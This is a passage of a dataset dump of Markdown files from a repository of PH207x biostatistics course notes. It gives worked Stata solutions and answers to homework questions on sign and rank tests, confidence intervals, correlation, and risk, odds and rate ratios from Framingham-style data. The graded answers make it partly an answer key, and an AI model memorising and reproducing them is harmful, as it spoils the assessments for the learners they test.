"UTF-8", "text": "## Nonparametric Tests ##\n\n#### 1. Suppose we wish to test a new treatment for dry, itchy eyes. We gather a group of eye patients, and, for each patient, we randomly treat one eye with the experimental treatment and one eye with the standard treatment. The outcome, eye relief, is a continuous measure, and the distribution of the differences in eye relief between eyes is normally distributed. Suppose we want to test whether the treatment is effective at improving eye relief. Which of the following tests is valid: ####\n> **Hint1:** Continues, normally distributed and we have dependent variables\n* sign test \n* signed-rank test \n* paired t-test \n* all of the above \n\n\n#### 2. Suppose you are conducting a two-sided sign test. You have data from 8 paired samples, and you observe 1 positive sign and 7 negative signs. What is the p-value corresponding to the null hypothesis that there is no difference in median between the two groups? ####\n\n```stata\n\tuse \"CVOS_me\"\n\tsigntest t6=t0\n```\n\n sign | observed | expected\n------------ | -------- | ---------\n positive | 1 | 4\n negative | 7 | 4\n zero | 0 | 0\n **TOTAL** | **8** | **8**\n\n```stata\nOne-sided tests:\n Ho: median of t6 - t0 = 0 vs.\n Ha: median of t6 - t0 > 0\n Pr(#positive >= 1) =\n Binomial(n = 8, x >= 1, p = 0.5) = 0.9961\n\n Ho: median of t6 - t0 = 0 vs.\n Ha: median of t6 - t0 < 0\n Pr(#negative >= 7) =\n Binomial(n = 8, x >= 7, p = 0.5) = 0.0352\n\nTwo-sided test:\n Ho: median of t6 - t0 = 0 vs.\n Ha: median of t6 - t0 != 0\n Pr(#positive >= 7 or #negative >= 7) =\n min(1, 2*Binomial(n = 8, x >= 7, p = 0.5)) = 0.0703\n```\n\n#### 3. Walker et al. (1987) examined the characteristics of children dying from sudden infant death syndrome. The sids.dta contains the age at death (in days) for a sample of 12 girls and 17 boys. Using an appropriate non-parametric test with a 0.05 level of significance, test whether the median age at death is the same for boys and girls. Be sure to verify the assumptions of your test. ####\n\n##### What is the absolute value of your test statistic? #####\n> **Hint1:** ABSOLUTE = NO NEGATIVE SIGN !!!! \n> **Hint2:** I did not put the test statistic in as 0.xxxx, just as .xxxx. Don't know if that will make a difference for you or not. \n> **Hint3:** You need to view/read the tutorial segment Nonparametrics for Independent Samples. \n> => **|Z|=|-0.044|=0.044**\n\n```stata\n\tuse \"sids.dta\"\n\tpwcorr Age Sex, sig\n\tspearman Age Sex\n\tranksum Age, by(Sex)\n```\n\n##### What is your p-value? #####\n> => **0.9647**\n\n\n###### Based on this test, can you conclude that we do not have enough evidence to suggest that the median age at death is different between boys and girls? ######\n* => **Yes**\n* No\n\n###### Would it be appropriate to use a two-sample t-test in this case?. ######\n* Yes\n* => **No**\n\n\n" }, { "alpha_fraction": 0.747826099395752, "alphanum_fraction": 0.782608687877655, "avg_line_length": 18.16666603088379, "blob_id": "18fd8f5360fa7c628695b492e56c19c94dbfa949", "content_id": "7682a362bcbb0916570c3e1b34966fd565680489", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 115, "license_type": "no_license", "max_line_length": 27, "num_lines": 6, "path": "/PH207x/stata/stataquest.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Type in Stata\nnet cd http://www.stata.com\nnet cd quest7\nnet install quest1\nnet install quest2\nnet install quest3\n" }, { "alpha_fraction": 0.5799848437309265, "alphanum_fraction": 0.6901693344116211, "avg_line_length": 38.949493408203125, "blob_id": "ebb783aba183601c156ba4f9813b9587e6006213", "content_id": "588b3de36bc05ad63ed730b3141a035e115533b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4019, "license_type": "no_license", "max_line_length": 287, "num_lines": 99, "path": "/PH207x/homework/six/Central Limit Theorem and Confidence Intervals.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Central Limit Theorem and Confidence Intervals #\nAccording to the WHO Global Database on Anaemia, the mean hemoglobin levels among primary school children in Delhi were estimated at μ=108 g/L, with standard deviation σ=12.5 g/L. (Source: http://who.int/vmnis/anaemia/data/database/countries/ind_ida.pdf)\n\nSuppose we took a random sample of 75 primary school children in Delhi. Denote the mean hemoglobin levels in this sample as xˉ. Throughout this question, assume that the sample size is large enough that the Central Limit Theorem is applicable and that σ is known. \n\n> μ=population= 108 g/L \n> σ=standard deviation= 12.5 g/L \n> n=sample size= 75 \n> xˉ= mean hemoglobin levels= ?\n\n1. According to the Central Limit Theorem, what is the expected value (mean) of xˉ?\nHints: see https://www.edx.org/static/content-harvard-id270x/handouts/JotterWeek5.390aec581f74.pdf in which it is written that as per the CLT, in the xˉdistribution μ is the mean.\nHint2: check SAMPLING DISTRIBUTIONS 10:50\n\n> x ̄ ∼ N (μ, σ/sqrt(n)) \n> x ̄ ~ N( 108, 1.4433757 ) \n> x ̄ ~ **108**\n\n\n2. According to the Central Limit Theorem, what is the standard deviation of xˉ?\nHints: The standard deviation of the sample mean is also known as standard error, see the hyperlink given in Q1.\nHint2: check SAMPLING DISTRIBUTIONS 11:04\n\nsd= σ/SQRT(n)= 12.5/sqrt(75)= **1.4433757**\n\n\n3. Suppose we take a large number of samples of size 75. What proportion of the samples would we expect to have a sample mean xˉ that lies between 106 and 110 g/L?\nHints: [106 < xbar < 110]= (110-108)/σ/sqrt(n) > Z > (106-108)/σ/sqrt(n) \nThen use di normal( value of(110-108)/σ/sqrt(n)) - normal(value of (106-108)/σ/sqrt(n))\n\n> z= (x⁻ +- μ) / ( σ/SQRT(n) ) \n> (110-108) / ( σ/SQRT(n) ) > z \n> (106-108) / ( σ/SQRT(n) ) < z\n\n\tdi normal( (110-108) / 1.4433757 ) - normal( (106-108) / 1.4433757 )\n> => **0.83414333**\n\n\n\n4. Suppose instead we repeatedly took random samples of size 25. What proportion of the samples would we expect to have a sample mean xˉ that lies between 106 and 110 g/L?\nHints: Q4 same as Q3 only the value of n is changed.\n\n> n= 25 \n> sd= 12.5/sqrt(25)= 2.5 \n> z= (x⁻ +- μ) / ( σ/SQRT(n) )\n\n\tdi normal( (110-108) / 2.5 ) - normal( (106-108) / 2.5 )\n> => **0.5762892**\n\n\n5. Again, suppose we repeatedly took samples of size 75. What proportion of the samples would we expect to have a mean less than xˉ=103?\nHints: Xbar < 103 = Z < (103-108)/σ/sqrt(n), then di normal(value of (103-108)/σ/sqrt(n))\nHint2: In (103-108)/σ/sqrt(n), σ = 12.5, n= 75 then di normal()\n\n> n= 75 \n> xˉ <= 103 \n> sd= 1.4433757 \n> z= (103-108)/1.4433757= -3.4641016\n\n\tdi normal( -3.4641016 )\n> => **0.000266**\n\n\n6. If we repeatedly took samples of size 75, we would expect that, in 20% of the samples, xˉ would be greater than ____?\n(Hint: Use invnormal(0.8) to find the P(Z>z∗)=1−0.8=0.2, where Z∼N(0,1).\nHint2: di invnormal(0.8)= (x bar - μ)/σ/sqrt(n) and then find the value of X bar\n\n\tdi invnormal(0.8)\n> => **0.84162123**\n\n> 0.84162123= (xˉ-108)/1.4433757 \n> => xˉ= 0.84162123*1.4433757+108= **109.21478**\n\n7. After taking a sample of size 75, we found that the sample mean was xˉ=103. Construct a 95% confidence interval for μ.\nHints: See the Confidence Interval section in https://www.edx.org/static/content-harvard-id270x/handouts/HandoutWeek5Review.2a666d8d60ca.pdf\n\n> xˉ=103 \n> [ x⁻-1.96*σ/SQRT(n), x⁻+1.96*σ/SQRT(n), ]\n\n\tdi 103 - 1.96*1.4433757 \n\tdi 103 + 1.96*1.4433757\n\n> Lower Bound: \n> => **100.17098**\n\n> Upper Bound: \n> => **105.82902**\n\n\n8. Based on the above interval, we can say that the probability that xˉ lies in the interval is 0.95.\n\n> True \n> => False \n\n\n9. Suppose we were also interested in the mean of the highly right skewed indicator of iron absorption, ferritin. Compared to the relatively symmetrically distributed indicator hemoglobin, do you think a larger or smaller sample size would be required to apply the central limit theorem?\n\n> Smaller \n> => Larger \n\n" }, { "alpha_fraction": 0.7709497213363647, "alphanum_fraction": 0.7777777910232544, "avg_line_length": 93.76470947265625, "blob_id": "99658661af0954433fef0d5ba762d2f99ea90409", "content_id": "ff88a68dcd6a5fa51037c61ce3625c70e5fcae5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1613, "license_type": "no_license", "max_line_length": 496, "num_lines": 17, "path": "/PH207x/excercises/Lesson7/Tutorial: Health Disparities Research.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Tutorial: Health Disparities Research #\nThe pathways between race/ethnicity, socioeconomic status, and health disparities are complex in the United States, e.g. [1, 2]. Using observational public databases like CHIS, we can investigate issues in health disparities. (However, it is important to always remember that association is not causation, and consequently we can only talk about observed associations in the dataset.) \n \nAs a simple example, we investigate the relationship between poverty-level and visiting the doctor in the past year. As in last week’s tutorial, we use a random sample of 500 respondents from the 2009 CHIS survey. (If you wish to do a more detailed analysis, you can download the entire CHIS dataset from their website.)\n\n\n### 1. Does modeling the number of people who went to the doctor using the binomial distribution seem appropriate? ###\n> => **Yes** \n> No \n\n2. This week, we stratify by poverty level. Within each of these groups, does modeling the number of people who went to the doctor using a binomial distribution seem appropriate?\n> => **Yes** \n> No \n\n\n## Solution ##\nThe binomial model is appropriate in both instances. For any population, there is a true proportion who goes to the doctor, and if we randomly sample from that population, we have a fixed p, fixed n, independent observations, and a binary outcome. Again, when we stratify, there is a fixed proportion of the population who goes to the doctor. So, even though we are now considering different populations, the binomial model still works, but the \"probability of success\" changes when you stratify.\n" }, { "alpha_fraction": 0.7225913405418396, "alphanum_fraction": 0.7259136438369751, "avg_line_length": 41.85714340209961, "blob_id": "7c0537fca35d9250c76024f7c5770c193ad31f76", "content_id": "1eb6ab8fdb3059730926c49290ae694a7ad82cf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 602, "license_type": "no_license", "max_line_length": 160, "num_lines": 14, "path": "/PH207x/homework/four/Probability_distributions-the_big_picture.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Probability distributions: the big picture\nRecap: In the last several questions about designing a study, we have learned about properties of common probability models in statistics, namely that:\n\n##### Q1. The _______ provides a good approximation to the binomial distribution when the event of interest is rare and the study population is large. #####\n\n * **Poisson**\n * normal \n * exponential\n\n##### Q2. The _______ provides a good approximation to the binomial distribution when the event of interest is not rare and the study population is large. #####\n\n * Poisson\n * **normal**\n * exponential \n\n" }, { "alpha_fraction": 0.6244399547576904, "alphanum_fraction": 0.6643343567848206, "avg_line_length": 38.52912521362305, "blob_id": "cbd4343eee04155a599bb705cf8c94431ca1068c", "content_id": "5e13d1d5b50d0ca885816b496ab75b6dffbec5ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 16300, "license_type": "no_license", "max_line_length": 895, "num_lines": 412, "path": "/PH207x/excercises/Lesson9/Correlation and Nonparametrics.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Correlation and Nonparametrics #\n> Links:\n\n1. http://istics.net/stat/correlations/\n2. http://data.worldbank.org\n3. http://www.google.com/publicdata/directory/\n\n\n## Pearson's Correlation Coefficient ##\n## Inference on Rho ##\n> Sampling distribution: \n> If X & Y are normally distributed and rho=0, then \n> \n> t_n-2= r/sqrt( (1-r²) / (n-2) ) \n\n### Example ###\n> r=-0.829 for DPT example \n> t= r*sqrt( (n-2) / (1-r²) ) \n> t= -0.829*sqrt( (20-2) / (1-(-0.829)^2) )= -6.29 \n> \n> versus t with 18 degrees of fredom, so p<0.001. \n> So reject J_0: rho=0\n\n```stata\n\tpwcorr diabp1 sysbp1 if _n<51 , sig\n```\n\n## Missconceptions ##\n## Spearman's Rank Correlation Coefficient ##\n> When you have any doubts about the distribution of your x's and your y's -whether they're normal or not- go with the Spearman's. \n> And now the other beauty of Spearman's is that this word linear doesn't appear here. This is truly a test for independence of these two characteristics. \n> Rank the Data:\n\ni | x | y | x_r | y_r | d | d²\n-------- | --- | ---- | ---- | ---- | ------ | -------\n 1 | 1.3 | 14.3 | 2 | 2 | 0 | 0\n 2 | 1.7 | 14.7 | 4 | 3 | 1 | 1\n 3 | 0.8 | 18.0 | 1 | 4 | -3 | 9\n 4 | 1.4 | 12.1 | 3 | 1 | 2 | 4\n\n> x and y are Raw Data \n> x_r and y_r are Ranks \n> d is the difference between x_r and y_r by using:\n\n\tr_s= ( 1 / (n-1) ) * n sum from 1 to n ( ( x_ri - x⁻_r ) / s_x_r ) ( ( y_ri - y⁻_r ) / s_y_r )\n\n## Tutorial: Correlation Analysis ##\n\n```stata\n\tuse \"WorldBank.dta\"\n\tpwcorr\n```\n\n> Results:\n\n | year | dpt | measles\n------------ | --------- | ------ | ----------\n year | 1.0000 | | \n dpt | 0.9476 | 1.0000 | \n measles | 0.9387 | 0.9973 | 1.0000\n\n> Alternative the follow can be used:\n\n```stata\n\tcorrelate\n```\n\n> Plot correlation:\n\n```stata\n\ttwoway (scatter measles year, sort) (scatter dpt year, sort)\n```\n\n> Remember that the **Pearson correlation coefficient** is a measure of the strength of the linear relationship between two variables. So what we're going to do is we're going to test the null hypothesis that rho is equal to zero, our correlation coefficient, against the alternative, that rho is not equal to zero. \n> H_0: p=0 \n> H_A: p != 0\n\n```stata\n\tpwcorr year measles, sig\n```\n\n> Results:\n\n | year | measles\n------------ | --------- | --------\n year | 1.0000 | \n measles | 0.9387 | 1.0000 \n | 0.0000 | \n\n\n> And what that does is it gives me the correlation coefficient in this top line. And on the bottom line, that gives me a **p value**. So what I can say here is that my p value is very small. It's less than 0.001. So in this case, I would reject my null hypothesis, and conclude that there is a positive relationship between time and measles vaccination coverage. p < 0.001\n\n```stata\n\tspearman year measles\n```\n\n## Another Correlation Example ##\n> In the HealthExpensesbyCountry.dta dataset, we assess temporal trends in health expenditures per capita and in number of hospital beds (per 1,000 individuals) in four countries: the United States, Great Britain, Japan, and Canada. \n> \n> However, in the following questions, we focus on the United States, but we encourage you to look at the other countries on your own! Health expenditures per capita in the United States are only available after 1995 and up until 2010. Please restrict your analysis to the years 1995-2010 for the questions below. \n> \n> Open the dataset HealthExpensesbyCountry.dta. In this question, you need to restrict to certain subsets of the data when performing your analysis. To do so, it is easiest to use \"if\" statements in Stata. For instance, to calculate the correlation beteen year and number of hospital beds in the United States between 1995 and 2010, you can type:\n\n```stata\n\tuse \"HealthExpensesbyCountry.dta\"\n\tpwcorr hospitalbeds year if country == \"United States\" & year > 1994, sig\n```\n\n> Results:\n\n | hospit~s | year \n------------- | -------- | --------\n hospitalbeds | 1.0000 | \n year | -0.9802 | 1.0000 \n | 0.0000 | \n\n\n> (You do not need to specify that year <= 2010 because the dataset only contains data through 2010.)\n\n### Consider the following questions: ###\n####1. Do the following relationships appear linear (use scatterplots to help answer the question)?####\n> **Health expenditures per capita and year from 1995-2010 in the United States**\n* => **Yes**\n* No\n\n```stata\n\tgraph matrix healthpercapita year if country == \"United States\" & year > 1994\n```\n\n> **Number of hospital beds and year from 1995-2010 in the United States**\n* => **Yes**\n* No\n\n```stata\n\tgraph matrix hospitalbeds year if country == \"United States\" & year > 1994\n```\n\n####2. Calculate the Pearson correlations for:####\n> **Health expenditures per capita and year from 1995-2010 in the United States** \n> => **0.9879**\n\n```stata\n\tpwcorr year healthpercapita if country == \"United States\" & year > 1994, sig\n```\n\n> Results:\n\n | year | healthpercapita \n--------------- | ------ | ---------------- \n year | 1.0000 | \nhealthpercapita | 0.9879 | 1.0000 \n | 0.0000 | \n\n\n> **Number of hospital beds and year from 1995-2010 in the United States** \n> => **-0.9802**\n\n```stata\n\tpwcorr year hospitalbeds if country == \"United States\" & year > 1994, sig\n```\n\n> Results:\n\n | year | hospitalbeds \n------------ | ------- | -------------- \n year | 1.0000 | \nhospitalbeds | -0.9802 | 1.0000 \n | 0.0000 | \n\n\n####3.Based on these results (and without doing any further calculations), would you expect annual health expenditures per capita and annual number of hospital beds in the United States between 1995 and 2010 to be positively correlated, negatively correlated, or uncorrelated?####\n* positive\n* => **negative**\n* no correlation\n\n> Plot:\n\n```stata\n\ttwoway (connected healthpercapita hospitalbeds if country==\"United States\") if year > 1994\n```\n\n####4. Based on the scatter plots in question 1 (and without doing any further calculations), would you expect the Spearman and Pearson correlations for health expenditures per capita and year from 1995-2010 in the United States to be similar?####\n* => **Yes**\n* No\n\n####5. Calculate the Spearman correlation for health expenditures per capita and year from 1995-2010 in the United States and compare to question 2.####\n> **1.0000**\n\n```stata\n\tspearman healthpercapita year if country == \"United States\" & year > 1994\n```\n\n> **Results:** \n> Number of obs = 16 \n> Spearman's rho = 1.0000 \n> Test of Ho: healthpercapita and year are independent \n> Prob > |t| = 0.0000\n\n\n####6. True or False: Using the answer from question 5, we can conclude that health expenditures per capita have increased every year since 1995.####\n* => **True**\n* False\n\n\n####7. These data are ecological. How does this play a role in the interpretation of the data? (Please discuss on the discussion boards.)####\n\n\n####8. Examine trends in health per capita, number of hospital beds, and time in the other countries in this dataset. (Please discuss on the discussion boards.)####\n\n\n\n\n> Source: Created from: World Bank, World Development Indicators and Global Development Finance. \n> \n> Hospital Beds: Data after 2005 are extracted from the World Health Statistics Table 6 published by WHO. WHS data is based on PAHO basic indicators 2011. Washington, DC, Pan American Health Organization, 2011 (www.paho.org/English/SHA/coredata/tabulator/newTabulator.htm); European health for all database (HFA-DB). Copenhagen, WHO Regional Office for Europe, 2011 (http://data.euro.who.int/hfadb); Western Pacific Country Health Information Profiles 2011 Revision. Manila, WHO Regional Office for the Western Pacific, 2010 (www.wpro.who.int/countries/countries.htm); Demographic, social and health indicators for countries of the Eastern Mediterranean. Cairo, WHO Regional Office for the Eastern Mediterranean, 2011; additional data compiled as of January 2011 by the WHO Regional Office for Africa and the WHO Regional Office for South-East Asia. Some data are supplemented by country data. \n> \n> Health per Capita: World Health Organization National Health Account database (see http://apps.who.int/nha/database for the most recent updates).\n\n## Sign test ##\n> So if we look at the signs, we've got 11 positive signs and two negative signs. And if we test the hypothesis, that this difference is just as likely to\nbe positive as negative --in other words, that median is 0--then we can ask the question, how often do you do a study with 13 signs and get only two negatives?\n\n```stata\n\tsigntest CF = Healthy\n```\n\n## Wilcoxon Signed Rank Test - One Sample ##\n> We look at the difference. We could do our sign test on these differences. But Wilcoxon said, no, here's what we'll do. We'll rank the differences. So here it is, we'll just rank them, ignoring the sign. \n> So look at all the ranks associated with negative numbers, and then look at the ranks associated with positive numbers, positive differences. \n> So that's the Wilcoxon signed-rank test, which is the same as --we could do it on one sample, the one I showed you here was on the two sample correlated or dependent situations.\n\n```stata\n\tsignrank placebo = drug\n```\n\n## Wilcoxon Rank Sum Test - Two Sample ##\n> Throw all samples in one list and rank them. \n> Then look at the total ranks in the one sample, look at the total ranks in\nthe other sample. If the two samples are the same size, then these two should be roughly the same. If the null hypothesis of no difference is correct. That's exactly like we did with the t. \n> With the ranks, we've got much more control about the variances.\n\n```stata\n\tranksum ment_age, by(ind)\n```\n\n### In summary, when should we use the Wilcoxon, when should we use student's t? ###\n> *Advantage:* Well, the advantage of the Wilcoxon is, we don't need to assume anything about the parent or population distribution of the variable in question. So we do not need to assume normality. \n> We do not need to assume that the population is Normal distributed for Wilcoxon to be applicable. \n> => **So Wilcoxon is more robust than student's t test.** \n> \n> *Disadvantage:* If in fact you were justified in making your normality assumption. So if in fact you could use the t, how much do you lose? And the answer is not that much. **When in fact you have normal data, the Wilcoxon is about 95% efficient.**\n\n\n## Tutorial: Nonparametrics for Paired Data ##\n> Are the data independent or dependent? \n> What parametric and nonparametric tests are available for this type of data? \n> What type of statistical test is most appropriate for this data and why?\n\n\n### Sign Test ###\n#### What are the null and alternative hypotheses? ####\n> For the t-test we would use mean but we are using a Nonparametrics test which is using the median. \n> H_0: Median of difference = 0 \n> H_A: Median is not equal to 0\n\n```stata\n\tuse \"CVOS.dta\"\n\tsigntest t6=t0\n```\n\n> Results:\n\n sign | observed | expected\n------------ | -------- | ---------\n positive | 8 | 5\n negative | 2 | 5\n zero | 0 | 0\n **TOTAL** | **10** | **10**\n\n```stata\nOne-sided tests: \n\tHo: median of t6 - t0 = 0 vs. \n\tHa: median of t6 - t0 > 0 \n\t\tPr(#positive >= 8) = \n\t\tBinomial(n = 10, x >= 8, p = 0.5) = 0.0547\n\n\tHo: median of t6 - t0 = 0 vs. \n\tHa: median of t6 - t0 < 0 \n\t\tPr(#negative >= 2) = \n\t\tBinomial(n = 10, x >= 2, p = 0.5) = 0.9893\n\nTwo-sided test: \n\tHo: median of t6 - t0 = 0 vs. \n\tHa: median of t6 - t0 != 0 \n\t\tPr(#positive >= 8 or #negative >= 8) = \n\t\tmin(1, 2*Binomial(n = 10, x >= 8, p = 0.5)) = 0.1094\n```\n\n> How many positiv and how many negative signs are expected under the null hypotheses. That mean, that the median of the differences is equal to 0. \n> The particularly that it is positiv is 1/2. \n> p-value= **0.1094**\n\n### Signed-Rank Test ###\n#### Suppose that instead of conducting the sign test we conduct the Wilcoxon signed-rank test. Which test has more power? Why? ####\n> Signed-Rank Test is more powerful. Incorporates the magnitude of the differences via the rank \n> It ranks the magnitude.\n\n## State the null and alternative hypothesis for the Wilcoxon signed-rank test ##\n> H_0: Median of difference = 0 \n> H_A: Median is not equal to 0\n\n\n```stata\n\tsignrank t6=t0\n```\n\n sign | obs | sum ranks | expected\n---------- | ------ | --------- | --------\n positive | 8 | 50 | 27.5\n negative | 2 | 5 | 27.5\n zero | 0 | 0 | 0\n **TOTAL** | **10** | **55** | **55**\n\n```stata\nunadjusted variance 96.25\nadjustment for ties 0.00\nadjustment for zeros 0.00\n ----------\nadjusted variance 96.25\n\nHo: t6 = t0\n z = 2.293\n Prob > |z| = 0.0218\n```\n\n> p-value= 0.0218 (is less than 0.5) \n> We have more power to detect the difference \n\n\n### Summary ###\n\n* Sign test\n\t* Uses the signs (+ or -) of the differences only\n\t* Not used often\n\t* For small n, use binomial distribution to calculate p-value for D (D is a binomial random variable with parameters n and p=1/2 under H_0) - D is not equal to positive signs\n* Wilcoxon Signed-Rank Test\n\t* Nonparametric analogue to the paried t-test\n\t* Incorporates the magnitude of differences via ranks\n\t* More powerful than the Sign Test and generally should be used if given a choice between the two\n\n\n## Tutorial: Nonparametrics for independent samples ##\n> In this tutorial we will use data from the Digitalis Investigation Group.\n* The DIG Trial was a randomized, double blind, multicenter trial with more than 300 centers in the US and Canada participating.\n* The purpose of the trial was to examine the safety and efficacy of Digoxin in treating patients with congestive heart failure in sinus rhythm.\n* The main paper can be found in the New England Journal of Medicine\n\n> The Wilcoxon rank-sum test was used to determine if there were any differences between groups in the number of hospitalizations \n> Examine the distribution of number of hospitalization by treatment group. Are they similar? Are they symmetric?\n\n\n```stata\n\tuse \"dig.dta\"\n\thist nhosp, by(trtmt)\n```\n\n> So as you can see, the distribution of the number of hospitalizations are similar between the two groups and they're also **non-normal** and they are **right-skewed**. \n> So we know we have non-normal data so we can't use a t-test because the assumptions of the **t-test** don't hold. \n> => **So we're going to use the Wilcoxon rank-sum test.**\n\n### Does the rank sum test require any assumptions? ###\n> Yes there are two assumptions:\n1. Samples must be indepenedent\n2. Distribution should have some shape. And they don't have the same shapes.\n\n### What is the null hypothesis for the rank sum test? What is the alternative? ###\n> The shape is already the same. But we can shift it right.\n\n```stata\n\tranksum nhosp, by(trtmt)\n```\n\n trtmt | obs | rank sum | expected \n------------- | -------- | ------------ | ---------\n 0 | 3403 | 11767615 | 11571902 \n 1 | 3397 | 11355786 | 11551499 \n **combined** | **6800** | **23123400** | **23123400** \n\n```stata\nunadjusted variance 6.552e+09\nadjustment for ties -3.811e+08\n ----------\nadjusted variance 6.171e+09\n\nHo: nhosp(trtmt==0) = nhosp(trtmt==1)\n z = 2.491\n Prob > |z| = 0.0127\n```\n\n> p-value=0.0127 - So it is less than 0.5 -> We reject the null hypotheses\n\n\n## Nonparametrics ##\n> Consider a clinical trial where patients are randomized to one of two treatments. We want to examine whether there is there is a difference between the two treatment groups with respect to a continuous outcome. \n> \n> We are considering conducting either a two-sample t-test or a Wilcoxon Rank Sum test to examine the differences between groups. True or false: these two tests have the same null hypotheses.\n* True\n* => **False**\n\n> Suppose we somehow know that the distribution of the outcome variable within each group is normally distributed. True or false: in this case, the two sample t-test and the Wilcoxon Rank Sum test have the same null hypothesis. \n* => **True**\n* False\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.3729257583618164, "alphanum_fraction": 0.49232688546180725, "avg_line_length": 52.059600830078125, "blob_id": "7bdba1bea63677ad3dced9d28b952c1a8e11d2db", "content_id": "508bc822ab5111170753d4d2b564f7aebbe99746", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8021, "license_type": "no_license", "max_line_length": 368, "num_lines": 151, "path": "/PH207x/homework/four/Stata Risk Ratio, Odds Ratios, Rate Ratios for using BMI, Death, and CHD.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Stata Risk Ratio, Odds Ratios, Rate Ratios for using BMI, Death, and CHD\nThe following table displays categories of body mass index for the participants at the 1956 exam. (Note: 19 of the 4434 participants are excluded from this table because of missing data on bmi1)\n\n## BMI and Number of People in Each BMI Category\n> BMI Category | Range of BMI | Frequency\n> ------------- | ------------- | -------------\n> Underweight | BMI<18.5 | 57\n> Normalweight | 18.5≤BMI<25 | 1936\n> Overweight | 25≤BMI<30 | 1845\n> Obese | 30≤BMI | 577\n\nUse Stata to perform the following calculations. Hint: All of the following questions ask you to compare obese subjects to normal weight subjects. Create a new binary variable using bmi1 which equals 1 if the person is obese and 0 if the person is normal weight. Anyone who is underweight or overweight should be missing a value for the new binary variable you create.\n\n\tgen newbmi1=.\n\treplace newbmi1=1 if bmi1>=30 & bmi1 <. \n\treplace newbmi1=0 if bmi1>=18.5 & bmi1 <25\n\tcs death newbmi1, or\n\n\n> newbmi1 | Exposed | Unexposed | Total\n> -------------- | --------- | --------- | ------------- \n> Cases | 259 | 571 | 830\n> Noncases | 318 | 1365 | 1683\n> | | \n> Total | 577 | 1936 | 2513\n> | | \n> Risk | .4488735 | .294938 | .3302825\n> | | \n\n> | Point estimate | [95% Conf. Interval] \n> --------------- | ---------------------- | --------------------------\n> Risk difference | .1539355 | .1085524 .1993186 \n> Risk ratio | 1.521925 | 1.358417 1.705113 \n> Attr. frac. ex. | .3429373 | .2638491 .4135287 \n> Attr. frac. pop | .107013 |\n> Odds ratio | 1.947015 | 1.608816 2.35632 (Cornfield)\n> chi2(1) = 47.62 Pr>chi2 = 0.0000\n\n\n##### Q1. Calculate the 24-year Risk Ratio for death comparing obese subjects (exposed group, n=577) to normal weight subjects (non-exposed group, n=1936). #####\n*Hint1: Is the same procedure as shown in the video at 1:45-3:10*\n\n>\t=> Risk Ratio= **1.521925**\n\n\n##### Q2. Calculate the 24-year Odds Ratio for death comparing obese subjects (exposed group, n=577) to normal weight subjects (non-exposed group, n=1936). #####\n*Hint1:Is the same procedure as shown in the video at 1:45-3:10*\n\n>\t=> Odds Ratio= **1.947015**\n\n\n##### Q3. Calculate the 24-year Rate Ratio for death comparing obese subjects (exposed group, n=577) to normal weight subjects (non-exposed group, n=1936). #####\n*Hint1: Uses the same variables as Q1 and Q2 and the procedure is at 6:39-8:00 of the video.*\n\n>\t=> Rate Ratio= **1.632792**\n\n\tir death newbmi1 timedth\n\n> newbmi1 | Exposed | Unexposed | Total\n> --------------- | --------- | ---------- | ------------- \n> Death indicator | 259 | 571 | 830\n> Time [years] to | 11308.9 | 40708.74 | 52017.64\n> | | | \n> Incidence rate | .0229023 | .0140265 | .0159561\n\n> | Point estimate | [95% Conf. Interval] \n> --------------- | ---------------------- | --------------------------\n> Inc. rate diff. | .0088758 | .0058587 .011893 \n> Inc. rate ratio | 1.632792 | 1.404331 1.894337 (exact)\n> Attr. frac. ex. | .3875522 | .2879172 .4721108 (exact)\n> Attr. frac. pop | .120935 | \n> (midp) Pr(k>=259) = 0.0000 (exact)\n> (midp) 2*Pr(k>=259) = 0.0000 (exact)\n\n\n##### Q4. Calculate the 24-year Rate Ratio for developing coronary heart disease comparing obese subjects (exposed group) to normal weight (non-exposed group), excluding subjects with prevalent CHD at the 1956 exam. Hint: Use the if/in tab options to restrict the sample to those without prevalent CHD at the 1956 exam (prevchd1 = = 0). #####\n*Hint1: Different variables from the previous 3 questions and the procedure is shown at 8:55-10:15 of the video.*\n\n>\t=> Rate Ratio= **2.050572**\n\n\tir anychd newbmi1 timechd if (prevchd1 == 0) \n\n> newbmi1 | Exposed | Unexposed | Total\n> --------------- | --------- | ---------- | ------------- \n> Incident Hosp MI| 180 | 349 | 529\n> Time [years] to | 9387.737 | 37324.05 | 46711.79\n> | | | \n> Incidence rate | .0191739 | .0093505 | .0113248\n\n> | Point estimate | [95% Conf. Interval] \n> --------------- | ---------------------- | ---------------------------\n> Inc. rate diff. | .0098234 | .0068555 .0127913 \n> Inc. rate ratio | 2.050572 | 1.703396 2.46163 (exact)\n> Attr. frac. ex. | .5123311 | .4129373 .593765 (exact)\n> Attr. frac. pop | .1743282 |\n> (midp) Pr(k>=180) = 0.0000 (exact)\n> (midp) 2*Pr(k>=180) = 0.0000 (exact)\n\n\n\n##### Q5. Calculate the 24-year Rate Ratio for developing coronary heart disease comparing (obese or overweight) subjects (exposed group) to normal weight (non-exposed group), excluding subjects with prevalent CHD at the 1956 exam. #####\n*Hint1: Different variables from the previous 3 questions and the procedure is shown at 8:55-10:15 of the video.*\n\n>\t=> Rate Ratio= **1.736394** \n\n\tgen newbmi3=.\n\treplace newbmi3=1 if ( bmi1>=30 & bmi1 <. ) | ( bmi1>=25 & bmi1 <30 )\n\treplace newbmi3=0 if bmi1>=18.5 & bmi1 <25\n\tir anychd newbmi3 timechd if (prevchd1 == 0) \n\n> newbmi1 | Exposed | Unexposed | Total\n> --------------- | --------- | ---------- | ------------- \n> Incident Hosp MI| 686 | 349 